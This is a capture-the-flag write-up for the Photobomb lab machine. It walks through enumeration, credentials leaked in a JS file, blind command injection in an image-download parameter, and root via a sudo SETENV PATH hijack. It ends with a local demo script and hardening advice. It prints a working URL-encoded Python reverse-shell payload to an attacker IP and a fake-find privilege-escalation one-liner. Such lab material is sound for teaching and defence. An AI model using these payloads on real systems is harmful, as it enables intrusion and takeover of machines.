Photobomb

Personal Rating: Medium

Enumeration

sudo nmap -sV <IP>

  • Two ports are open: 22 (SSH) and 80 (nginx 1.18 serving the web application)

  • There was interesting info in the source code:

<p>To get started, please <a href="/printer" class="creds">click here!</a> (the credentials are in your welcome pack).</p>
<p>If you have any problems with your printer, please call our Technical Support team on 4 4283 77468377.</p>

I continued with some directory fuzzing. All of these paths resolved to the same page:

	/printer
	/printers
	/printerfriendly
	/printer_friendly
	/printer-friendly
	/printer_icon
	/printer-icon
	/printerFriendly

Requesting a non-existent page returns an interesting error:

A JS file served by the site contains a URL with embedded HTTP basic-auth credentials (the "welcome pack" login for /printer): http://pH0t0:b0Mb!@photobomb.htb/printer

The /printer page lets you download photos. Intercepting the download request in Burp and trying different injections, the response changes when ;something is appended to a parameter value, which points to a blind OS command injection.

Blind OS Command Injection

Injecting into the filetype parameter with the payload jpg;ping+-c+4+10.10.16.4 and listening with tcpdump on the attacker host shows the incoming ICMP echo requests, confirming that the command is executed.

Several reverse shell payloads did not work. Only a Python reverse shell worked, and only once = and ; inside the command were URL-encoded (%3d, %3b) and spaces replaced by +. The parameters travel in a URL-encoded form body, so a raw & or = inside the injected command can be consumed as a field delimiter and never reaches the shell.

This was the POST body that worked in the end (attacker listening on 10.10.16.4:4444):

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;export+RHOST%3d"10.10.16.4"%3bexport+RPORT%3d4444%3bpython3+-c+'import+sys,socket,os,pty%3bs%3dsocket.socket()%3bs.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))%3b[os.dup2(s.fileno(),fd)+for+fd+in+(0,1,2)]%3bpty.spawn("sh")'&dimensions=3000x2000

sudo SETENV + PATH Hijack

sudo -l shows that the user wizard may run /opt/cleanup.sh as root via sudo, and that the rule carries the SETENV tag.

SETENV lets you pass environment variables on the sudo command line that sudo would otherwise reset, PATH included. Since cleanup.sh calls find by its bare name rather than an absolute path, a fake executable named "find" that launches /bin/bash, placed in the home directory of the user "wizard", is found first when that directory is put at the front of PATH, and it runs as root:

sudo PATH=/home/wizard:/bin /opt/cleanup.sh
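As an added example, not from the original writeup: the PATH hijack reproduced locally without sudo, so the mechanism can be run and tested, next to a hardened version of the script that is immune to it. Only the bare `find` call is kept from /opt/cleanup.sh; everything else in the stand-in scripts, and the marker-writing fake find, is assumed here. On the box itself one way to create the fake find is echo -e '#!/bin/bash\n/bin/bash' > /home/wizard/find && chmod +x /home/wizard/find, after which the sudo command above drops into a root shell.

```bash
#!/usr/bin/env bash
# Added example, not from the original writeup. Assumed stand-ins for
# /opt/cleanup.sh (only the bare 'find' call is taken from the box) and for
# the attacker's fake find (it records who ran it instead of exec'ing bash).

# Drop a fake `find` into $1 that records the user it runs as.
make_fake_find() {
    local dir="$1"
    cat > "$dir/find" <<EOF
#!/bin/bash
# Stand-in for the attacker's find: the real one would exec /bin/bash.
echo "find hijacked, running as \$(id -un)" > "$dir/marker"
EOF
    chmod 755 "$dir/find"
}

# Vulnerable stand-in for /opt/cleanup.sh: relative `find`, inherited PATH.
vulnerable_script() {
    cat <<'EOF'
#!/bin/bash
cd "$(dirname "$0")"
find source_images -type f -name '*.jpg' -exec echo {} \;
EOF
}

# Hardened version: pin PATH at the top and call the binary by absolute path,
# so nothing the caller puts into the environment changes what is executed.
hardened_script() {
    cat <<'EOF'
#!/bin/bash
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
cd "$(dirname "$0")"
/usr/bin/find source_images -type f -name '*.jpg' -exec echo {} \;
EOF
}

# Run $1 with the attacker's directory $2 first in PATH. This mirrors
#   sudo PATH=/home/wizard:/bin /opt/cleanup.sh
# minus the privilege step. Returns 0 if the fake find ran, 1 otherwise.
run_with_hijacked_path() {
    local script="$1" dir="$2"
    rm -f "$dir/marker"
    PATH="$dir:/usr/bin:/bin" "$script" >/dev/null 2>&1 || true
    [ -f "$dir/marker" ]
}

# Build a scratch copy of the chosen script variant and attack it.
# Returns 0 if the hijack succeeded, 1 if the real find was used.
demo() {
    local variant="$1" dir rc=1
    dir="$(mktemp -d)"
    mkdir -p "$dir/source_images"
    : > "$dir/source_images/a.jpg"
    make_fake_find "$dir"
    "${variant}_script" > "$dir/cleanup.sh"
    chmod 755 "$dir/cleanup.sh"
    if run_with_hijacked_path "$dir/cleanup.sh" "$dir"; then
        printf '%s: %s\n' "$variant" "$(cat "$dir/marker")"
        rc=0
    else
        printf '%s: real find ran, hijack failed\n' "$variant"
    fi
    rm -rf "$dir"
    return "$rc"
}

demo vulnerable || true   # the fake find runs
demo hardened || true     # the pinned PATH and absolute path defeat it
```

The fix has two parts: the script should set its own PATH and call binaries by absolute path, and the sudoers rule should drop SETENV, because that tag is what lets the caller's PATH survive sudo's environment reset in the first place.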
